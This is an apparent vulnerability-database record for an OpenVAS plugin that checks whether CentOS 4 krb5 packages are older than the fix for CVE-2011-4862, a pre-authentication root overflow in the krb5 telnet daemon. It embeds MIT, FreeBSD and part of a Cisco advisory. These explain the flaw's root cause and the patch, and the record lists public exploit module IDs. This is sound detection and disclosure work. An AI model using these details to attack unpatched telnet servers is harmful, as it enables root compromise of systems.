CentOS Update for krb5-devel CESA-2011:1851 centos4
2012-07-30T00:00:00
ID OPENVAS:881380 Type openvas Reporter Copyright (c) 2012 Greenbone Networks GmbH Modified 2018-01-05T00:00:00
Description
Version check of the krb5 packages (krb5-devel, krb5-libs, krb5-server, krb5-workstation, krb5) on CentOS 4 against the fixed build 1.3.4-65.el4 from CESA-2011:1851. The underlying flaw, CVE-2011-4862, is an unauthenticated buffer overflow in the krb5 telnet daemon shipped in krb5-workstation, giving remote code execution as root; the daemon is not enabled by default, so a hit from this package-level check proves an unpatched package rather than an exposed service.
###############################################################################
# OpenVAS Vulnerability Test
#
# CentOS Update for krb5-devel CESA-2011:1851 centos4
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");

# Report strings, reproduced verbatim from the CESA-2011:1851 / RHSA-2011:1851
# advisory text. Note the nuance the advisory itself spells out: the vulnerable
# code is the Kerberos telnet daemon in krb5-workstation, which is disabled by
# default and normally firewalled, so a positive result from this NVT means
# "unpatched package installed", not "exploitable telnetd reachable".
tag_solution = "Please Install the Updated Packages.";

# Package this auto-generated script is keyed on; the detection code below also
# covers the sibling sub-packages built from the same krb5 source RPM.
tag_affected = "krb5-devel on CentOS 4";

tag_insight = "Kerberos is a network authentication system which allows clients and
servers to authenticate to each other using symmetric encryption and a
trusted third- party, the Key Distribution Center (KDC).
A buffer overflow flaw was found in the MIT krb5 telnet daemon
(telnetd). A remote attacker who can access the telnet port of a
target machine could use this flaw to execute arbitrary code as
root. (CVE-2011-4862)
Note that the krb5 telnet daemon is not enabled by default in any
version of Red Hat Enterprise Linux. In addition, the default firewall
rules block remote access to the telnet port. This flaw does not
affect the telnet daemon distributed in the telnet-server package.
For users who have installed the krb5-workstation package, have
enabled the telnet daemon, and have it accessible remotely, this
update should be applied immediately.
All krb5-workstation users should upgrade to these updated packages,
which contain a backported patch to correct this issue.";
if(description)
{
  # --- Identity and bookkeeping of this NVT ---------------------------------
  script_id(881380);
  script_version("$Revision: 8295 $");
  script_name("CentOS Update for krb5-devel CESA-2011:1851 centos4 ");
  script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
  script_family("CentOS Local Security Checks");
  script_category(ACT_GATHER_INFO);
  script_tag(name:"creation_date", value:"2012-07-30 17:37:55 +0530 (Mon, 30 Jul 2012)");
  script_tag(name:"last_modification", value:"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $");

  # --- Vulnerability references and severity ---------------------------------
  # CVSSv2 10.0: network, low complexity, no authentication, complete C/I/A.
  # The flaw is the unbounded key-ID copy in libtelnet encrypt_keyid() of the
  # krb5 telnet daemon, exploitable pre-authentication for root.
  script_cve_id("CVE-2011-4862");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_xref(name:"CESA", value:"2011:1851");
  script_xref(name:"URL", value:"http://lists.centos.org/pipermail/centos-announce/2011-December/018360.html");

  # --- Report text -------------------------------------------------------------
  script_tag(name:"summary", value:"Check for the Version of krb5-devel");
  script_tag(name:"affected", value:tag_affected);
  script_tag(name:"solution", value:tag_solution);
  script_tag(name:"insight", value:tag_insight);
  script_tag(name:"solution_type", value:"VendorFix");

  # qod_type "package": the verdict rests on the installed RPM version alone.
  # Nothing in this script probes whether telnetd is enabled or reachable, so
  # consumers should not read a match as confirmed network exposure.
  script_tag(name:"qod_type", value:"package");

  # --- Prerequisites ----------------------------------------------------------
  # Requires an authenticated SSH login on a CentOS host whose RPM list has
  # already been collected by gather-package-list.nasl.
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/centos", "ssh/login/rpms");

  exit(0);
}
include("pkg-lib-rpm.inc");

# Version-based detection. Every package built from the krb5 source RPM is
# compared against the fixed build 1.3.4-65.el4 published in CESA-2011:1851.
# The overflow itself lives in the telnet daemon (krb5-workstation); the other
# sub-packages are listed because the advisory rebuilt the whole source RPM.
# A hit therefore proves an unpatched package, not an enabled or reachable
# telnetd -- but the fix should still be applied before the service is ever
# turned on.

release = get_kb_item("ssh/login/release");
res = "";

# No release string in the knowledge base: the SSH package gathering did not
# run or did not identify a CentOS host, so there is nothing to compare.
if(release == NULL) {
  exit(0);
}

if(release == "CentOS4")
{
  # Fixed EVR suffix in the pkg-lib-rpm "name~version~release" notation.
  fixed = "~1.3.4~65.el4";

  foreach pkg (make_list("krb5-devel", "krb5-libs", "krb5-server", "krb5-workstation", "krb5"))
  {
    # isrpmvuln() yields a non-NULL report string when the installed package
    # is judged affected relative to the fixed build; the first such package
    # is reported and the script stops, exactly as the original chain of
    # if-statements did.
    res = isrpmvuln(pkg:pkg, rpm:pkg + fixed, rls:"CentOS4");
    if(res != NULL)
    {
      security_message(data:res);
      exit(0);
    }
  }

  # __pkg_match is a global maintained by pkg-lib-rpm; presumably it is set
  # when at least one listed package was present but not judged vulnerable.
  # exit(99) is the scanner's "checked, not vulnerable" status.
  if(__pkg_match) exit(99);

  exit(0);
}
{"id": "OPENVAS:881380", "type": "openvas", "bulletinFamily": "scanner", "title": "CentOS Update for krb5-devel CESA-2011:1851 centos4 ", "description": "Check for the Version of krb5-devel", "published": "2012-07-30T00:00:00", "modified": "2018-01-05T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=881380", "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "references": ["http://lists.centos.org/pipermail/centos-announce/2011-December/018360.html", "2011:1851"], "cvelist": ["CVE-2011-4862"], "lastseen": "2018-01-06T13:07:07", "viewCount": 1, "enchantments": {"score": {"value": 8.6, "vector": "NONE", "modified": "2018-01-06T13:07:07", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-1851", "CVE-2011-4862"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27599", "SECURITYVULNS:VULN:12120", "SECURITYVULNS:DOC:27503", "SECURITYVULNS:DOC:27502"]}, {"type": "suse", "idList": ["SUSE-SU-2012:0056-1", "SUSE-SU-2012:0024-1", "OPENSUSE-SU-2012:0051-1"]}, {"type": "redhat", "idList": ["RHSA-2011:1851", "RHSA-2011:1852", "RHSA-2011:1853", "RHSA-2011:1854"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/FREEBSD/TELNET/TELNET_ENCRYPT_KEYID", "MSF:EXPLOIT/LINUX/TELNET/TELNET_ENCRYPT_KEYID", "MSF:AUXILIARY/SCANNER/TELNET/TELNET_ENCRYPT_OVERFLOW"]}, {"type": "exploitdb", "idList": ["EDB-ID:18368", "EDB-ID:18369", "EDB-ID:18280"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108199", "PACKETSTORM:108694", "PACKETSTORM:108198", "PACKETSTORM:108539"]}, {"type": "saint", "idList": ["SAINT:9BB5708972A26A51904B1BC21D31E721", "SAINT:2E667FA9EE1CC48C054B8BF1D1337065", "SAINT:4B6F19E604FCF1B28C3D4F6A458FF688"]}, {"type": "zdt", "idList": ["1337DAY-ID-22784"]}, {"type": "cisco", "idList": ["CISCO-SA-20120126-IRONPORT"]}, {"type": "centos", "idList": ["CESA-2011:1852", "CESA-2011:1851"]}, {"type": "debian", "idList": 
["DEBIAN:DSA-2373-1:B7CB7", "DEBIAN:DSA-2375-1:FD512", "DEBIAN:DSA-2372-1:C4E25"]}, {"type": "oraclelinux", "idList": ["ELSA-2011-1851", "ELSA-2011-1852"]}, {"type": "seebug", "idList": ["SSV:26112"]}, {"type": "freebsd", "idList": ["4DDC78DC-300A-11E1-A2AA-0016CE01E285"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2011-1851.NASL", "ORACLELINUX_ELSA-2011-1852.NASL", "CENTOS_RHSA-2011-1852.NASL", "ORACLELINUX_ELSA-2011-1851.NASL", "DEBIAN_DSA-2375.NASL", "FREEBSD_PKG_4DDC78DC300A11E1A2AA0016CE01E285.NASL", "CISCO-SA-20120126-ESA.NASL", "DEBIAN_DSA-2373.NASL", "SOLARIS11_TELNET_20120404.NASL", "FEDORA_2011-17493.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310881380", "OPENVAS:136141256231070691", "OPENVAS:1361412562310122016", "OPENVAS:1361412562310870526", "OPENVAS:870690", "OPENVAS:136141256231071180", "OPENVAS:870526", "OPENVAS:1361412562310103373", "OPENVAS:103373", "OPENVAS:1361412562310881314"]}, {"type": "gentoo", "idList": ["GLSA-201202-05"]}, {"type": "fedora", "idList": ["FEDORA:836D520F9D"]}], "modified": "2018-01-06T13:07:07", "rev": 2}, "vulnersScore": 8.6}, "pluginID": "881380", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for krb5-devel CESA-2011:1851 centos4 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Kerberos is a network authentication system which allows clients and\n servers to authenticate to each other using symmetric encryption and a\n trusted third- party, the Key Distribution Center (KDC).\n\n A buffer overflow flaw was found in the MIT krb5 telnet daemon\n (telnetd). A remote attacker who can access the telnet port of a\n target machine could use this flaw to execute arbitrary code as\n root. (CVE-2011-4862)\n \n Note that the krb5 telnet daemon is not enabled by default in any\n version of Red Hat Enterprise Linux. In addition, the default firewall\n rules block remote access to the telnet port. 
This flaw does not\n affect the telnet daemon distributed in the telnet-server package.\n \n For users who have installed the krb5-workstation package, have\n enabled the telnet daemon, and have it accessible remotely, this\n update should be applied immediately.\n \n All krb5-workstation users should upgrade to these updated packages,\n which contain a backported patch to correct this issue.\";\n\ntag_affected = \"krb5-devel on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-December/018360.html\");\n script_id(881380);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:37:55 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-4862\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1851\");\n script_name(\"CentOS Update for krb5-devel CESA-2011:1851 centos4 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of krb5-devel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n 
exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-libs\", rpm:\"krb5-libs~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", rpm:\"krb5-workstation~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "naslFamily": "CentOS Local Security Checks"}
{"cve": [{"lastseen": "2020-12-09T19:39:12", "description": "Buffer overflow in libtelnet/encrypt.c in telnetd in FreeBSD 7.3 through 9.0, MIT Kerberos Version 5 Applications (aka krb5-appl) 1.0.2 and earlier, Heimdal 1.5.1 and earlier, GNU inetutils, and possibly other products allows remote attackers to execute arbitrary code via a long encryption key, as exploited in the wild in December 2011.", "edition": 5, "cvss3": {}, "published": "2011-12-25T01:55:00", "title": "CVE-2011-4862", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4862"], "modified": "2017-08-29T01:30:00", "cpe": ["cpe:/o:freebsd:freebsd:8.2", "cpe:/o:freebsd:freebsd:7.3", "cpe:/a:h5l:heimdal:1.5.1", "cpe:/o:freebsd:freebsd:8.0", "cpe:/a:mit:krb5-appl:1.02", "cpe:/o:freebsd:freebsd:9.0", "cpe:/o:freebsd:freebsd:8.1"], "id": "CVE-2011-4862", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4862", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:freebsd:freebsd:8.1:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:h5l:heimdal:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:mit:krb5-appl:1.02:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-4862"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: 
SHA1\r\n\r\nMITKRB5-SA-2011-008\r\n\r\nMIT krb5 Security Advisory 2011-008\r\nOriginal release: 2011-12-26\r\nLast update: 2011-12-26\r\n\r\nTopic: buffer overflow in telnetd\r\n\r\nCVE-2011-4862\r\n\r\nCVSSv2 Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C\r\n\r\nCVSSv2 Base Score: 10\r\n\r\nAccess Vector: Network\r\nAccess Complexity: Low\r\nAuthentication: None\r\nConfidentiality Impact: Complete\r\nIntegrity Impact: Complete\r\nAvailability Impact: Complete\r\n\r\nCVSSv2 Temporal Score: 8.3\r\n\r\nExploitability: Functional\r\nRemediation Level: Official Fix\r\nReport Confidence: Confirmed\r\n\r\nSUMMARY\r\n=======\r\n\r\nThe telnet daemon (telnetd) in MIT krb5 (and in krb5-appl after the\r\napplications were moved to a separate distribution for krb5-1.8) is\r\nvulnerable to a buffer overflow. The flaw does not require\r\nauthentication to exploit. Exploit code is reported to be actively\r\nused in the wild.\r\n\r\nIMPACT\r\n======\r\n\r\nAn unauthenticated remote attacker can cause a buffer overflow and\r\nprobably execute arbitrary code with the privileges of the telnet\r\ndaemon (normally root).\r\n\r\nAFFECTED SOFTWARE\r\n=================\r\n\r\n* The telnet daemon in all releases of MIT krb5 prior to krb5-1.8 is\r\n vulnerable. Later releases moved the telnet code to the krb5-appl\r\n distribution.\r\n\r\n* The telnet daemon in all releases of krb5-appl is vulnerable.\r\n\r\nFIXES\r\n=====\r\n\r\n* Workaround: Disable telnet and use a more secure remote login\r\n solution, such as SSH.\r\n\r\n* A future release of krb5-appl will fix this vulnerability.\r\n\r\n* Apply the following patch:\r\n\r\ndiff --git a/telnet/libtelnet/encrypt.c b/telnet/libtelnet/encrypt.c\r\nindex f75317d..b8d6cdd 100644\r\n- 
--- a/telnet/libtelnet/encrypt.c\r\n+++ b/telnet/libtelnet/encrypt.c\r\n@@ -757,6 +757,9 @@ static void encrypt_keyid(kp, keyid, len)\r\n int dir = kp->dir;\r\n register int ret = 0;\r\n \r\n+ if (len > MAXKEYLEN)\r\n+ len = MAXKEYLEN;\r\n+\r\n if (!(ep = (*kp->getcrypt)(*kp->modep))) {\r\n if (len == 0)\r\n return;\r\n\r\n\r\n This patch is also available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2011-008-patch.txt\r\n\r\n A PGP-signed patch is available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2011-008-patch.txt.asc\r\n\r\nREFERENCES\r\n==========\r\n\r\nThis announcement is posted at:\r\n\r\n http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-008.txt\r\n\r\nThis announcement and related security advisories may be found on the\r\nMIT Kerberos security advisory page at:\r\n\r\n http://web.mit.edu/kerberos/advisories/index.html\r\n\r\nThe main MIT Kerberos web page is at:\r\n\r\n http://web.mit.edu/kerberos/index.html\r\n\r\nCVSSv2:\r\n\r\n http://www.first.org/cvss/cvss-guide.html\r\n http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\n\r\nCVE: CVE-2011-4862\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862\r\n\r\nhttp://lists.freebsd.org/pipermail/freebsd-security/2011-December/006117.html\r\n\r\nACKNOWLEDGMENTS\r\n===============\r\n\r\nWe became aware of this vulnerability through a FreeBSD security\r\nadvisory.\r\n\r\nCONTACT\r\n=======\r\n\r\nThe MIT Kerberos Team security contact address is\r\n<krbcore-security@mit.edu>. 
When sending sensitive information,\r\nplease PGP-encrypt it using the following key:\r\n\r\npub 2048R/56CD8F76 2010-12-29 [expires: 2012-02-01]\r\nuid MIT Kerberos Team Security Contact <krbcore-security@mit.edu>\r\n\r\nDETAILS\r\n=======\r\n\r\nIf the telnetd receives an ENCRYPT suboption that includes a key ID,\r\nencrypt_keyid() in libtelnet/encrypt.c copies the suboption contents\r\ninto a fixed-size static buffer without first constraining the length,\r\nleading to a buffer overflow.\r\n\r\nREVISION HISTORY\r\n================\r\n\r\n2011-12-26 original release\r\n\r\nCopyright (C) 2011 Massachusetts Institute of Technology\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.8 (SunOS)\r\n\r\niEYEARECAAYFAk744dsACgkQSO8fWy4vZo6oOACdFW96Ei5AHXbXHBsHaax6tiEE\r\n8AIAoJjMKx/2cbcLiTlHYiN3ypy8XF4S\r\n=acqN\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-01-02T00:00:00", "published": "2012-01-02T00:00:00", "id": "SECURITYVULNS:DOC:27503", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27503", "title": "MITKRB5-SA-2011-008 buffer overflow in telnetd [CVE-2011-4862]", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:45", "bulletinFamily": "software", "cvelist": ["CVE-2011-4862"], "description": "Buffer overflow in BSD telnetd / MIT krb5 telnetd is actively exploited in-the-wild.", "edition": 1, "modified": "2012-01-30T00:00:00", "published": "2012-01-30T00:00:00", "id": "SECURITYVULNS:VULN:12120", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12120", "title": "MIT / FreeBSD / Cisco telnetd buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-4862"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: 
SHA1\r\n\r\n=============================================================================\r\nFreeBSD-SA-11:08.telnetd Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: telnetd code execution vulnerability\r\n\r\nCategory: core\r\nModule: contrib\r\nAnnounced: 2011-12-23\r\nAffects: All supported versions of FreeBSD.\r\nCorrected: 2011-12-23 15:00:37 UTC (RELENG_7, 7.4-STABLE)\r\n 2011-12-23 15:00:37 UTC (RELENG_7_4, 7.4-RELEASE-p5)\r\n 2011-12-23 15:00:37 UTC (RELENG_7_3, 7.3-RELEASE-p9)\r\n 2011-12-23 15:00:37 UTC (RELENG_8, 8.2-STABLE)\r\n 2011-12-23 15:00:37 UTC (RELENG_8_2, 8.2-RELEASE-p5)\r\n 2011-12-23 15:00:37 UTC (RELENG_8_1, 8.1-RELEASE-p7)\r\n 2011-12-23 15:00:37 UTC (RELENG_9, 9.0-STABLE)\r\n 2011-12-23 15:00:37 UTC (RELENG_9_0, 9.0-RELEASE)\r\nCVE Name: CVE-2011-4862\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:http://security.FreeBSD.org/>.\r\n\r\nI. Background\r\n\r\nThe FreeBSD telnet daemon, telnetd(8), implements the server side of the\r\nTELNET virtual terminal protocol. It has been disabled by default in\r\nFreeBSD since August 2001, and due to the lack of cryptographic security\r\nin the TELNET protocol, it is strongly recommended that the SSH protocol\r\nbe used instead. The FreeBSD telnet daemon can be enabled via the\r\n/etc/inetd.conf configuration file and the inetd(8) daemon.\r\n\r\nThe TELNET protocol has a mechanism for encryption of the data stream\r\n(but it is not cryptographically strong and should not be relied upon\r\nin any security-critical applications).\r\n\r\nII. Problem Description\r\n\r\nWhen an encryption key is supplied via the TELNET protocol, its length\r\nis not validated before the key is copied into a fixed-size buffer.\r\n\r\nIII. 
Impact\r\n\r\nAn attacker who can connect to the telnetd daemon can execute arbitrary\r\ncode with the privileges of the daemon (which is usually the "root"\r\nsuperuser).\r\n\r\nIV. Workaround\r\n\r\nNo workaround is available, but systems not running the telnet daemon\r\nare not vulnerable.\r\n\r\nNote that the telnet daemon is usually run via inetd, and consequently\r\nwill not show up in a process listing unless a connection is currently\r\nactive; to determine if it is enabled, run\r\n\r\n$ ps ax | grep telnetd | grep -v grep\r\n$ grep telnetd /etc/inetd.conf | grep -vE '^#'\r\n\r\nIf any output is produced, your system may be vulnerable.\r\n\r\nV. Solution\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE, or to the\r\nRELENG_8_2, RELENG_8_1, RELENG_7_4, or RELENG_7_3 security branch dated\r\nafter the correction date.\r\n\r\n2) To update your vulnerable system via a source code patch:\r\n\r\nThe following patches have been verified to apply to FreeBSD 7.4, 7.3,\r\n8.2, and 8.1 systems.\r\n\r\na) Download the patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n# fetch http://security.FreeBSD.org/patches/SA-11:08/telnetd.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-11:08/telnetd.patch.asc\r\n\r\nb) Execute the following commands as root:\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n# cd /usr/src/lib/libtelnet\r\n# make obj && make depend && make && make install\r\n# cd /usr/src/libexec/telnetd\r\n# make obj && make depend && make && make install\r\n\r\n3) To update your vulnerable system via a binary patch:\r\n\r\nSystems running 7.4-RELEASE, 7.3-RELEASE, 8.2-RELEASE, or 8.1-RELEASE on\r\nthe i386 or amd64 platforms can be updated via the freebsd-update(8)\r\nutility:\r\n\r\n# freebsd-update fetch\r\n# freebsd-update install\r\n\r\nVI. 
Correction details\r\n\r\nThe following list contains the revision numbers of each file that was\r\ncorrected in FreeBSD.\r\n\r\nCVS:\r\n\r\nBranch Revision\r\n Path\r\n- -------------------------------------------------------------------------\r\nRELENG_7\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.2.24.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.24.1\r\nRELENG_7_4\r\n src/UPDATING 1.507.2.36.2.7\r\n src/sys/conf/newvers.sh 1.72.2.18.2.10\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.2.38.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.40.2\r\nRELENG_7_3\r\n src/UPDATING 1.507.2.34.2.11\r\n src/sys/conf/newvers.sh 1.72.2.16.2.13\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.2.36.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.38.2\r\nRELENG_8\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.3.2.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.36.2\r\nRELENG_8_2\r\n src/UPDATING 1.632.2.19.2.7\r\n src/sys/conf/newvers.sh 1.83.2.12.2.10\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.3.8.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.36.1.6.2\r\nRELENG_8_1\r\n src/UPDATING 1.632.2.14.2.10\r\n src/sys/conf/newvers.sh 1.83.2.10.2.11\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.3.6.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.36.1.4.2\r\nRELENG_9\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.3.10.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.42.2\r\nRELENG_9_0\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.3.12.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.42.1.2.2\r\n- -------------------------------------------------------------------------\r\n\r\nSubversion:\r\n\r\nBranch/path Revision\r\n- -------------------------------------------------------------------------\r\nstable/7/ r228843\r\nreleng/7.4/ r228843\r\nreleng/7.3/ r228843\r\nstable/8/ r228843\r\nreleng/8.2/ r228843\r\nreleng/8.1/ r228843\r\nstable/9/ r228843\r\nreleng/9.0/ 
r228843\r\n- -------------------------------------------------------------------------\r\n\r\nVII. References\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862\r\n\r\nThe latest revision of this advisory is available at\r\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-11:08.telnetd.asc\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.18 (FreeBSD)\r\n\r\niEYEARECAAYFAk70nOoACgkQFdaIBMps37IYcwCfXn5aQTfQDe/AnS31JBg+BB1m\r\nHJMAmgOE5pUKTlFqLw5UBouMNFfUmu2u\r\n=dcyj\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-01-02T00:00:00", "published": "2012-01-02T00:00:00", "id": "SECURITYVULNS:DOC:27502", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27502", "title": "FreeBSD Security Advisory FreeBSD-SA-11:08.telnetd", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-4862"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA256\r\n\r\nCisco Security Advisory: Cisco IronPort Appliances Telnet Remote Code\r\nExecution Vulnerability\r\n\r\nAdvisory ID: cisco-sa-20120126-ironport\r\n\r\nRevision 1.0\r\n\r\nFor Public Release 2012 January 26 17:00 UTC (GMT)\r\n\r\n+--------------------------------------------------------------------\r\n\r\nSummary\r\n=======\r\n\r\nCisco IronPort Email Security Appliances (ESA) and Cisco IronPort\r\nSecurity Management Appliances (SMA) contain a vulnerability that may\r\nallow a remote, unauthenticated attacker to execute arbitrary code\r\nwith elevated privileges.\r\n\r\nWorkarounds that mitigate this vulnerability are available.\r\n\r\nThis advisory is available at the following 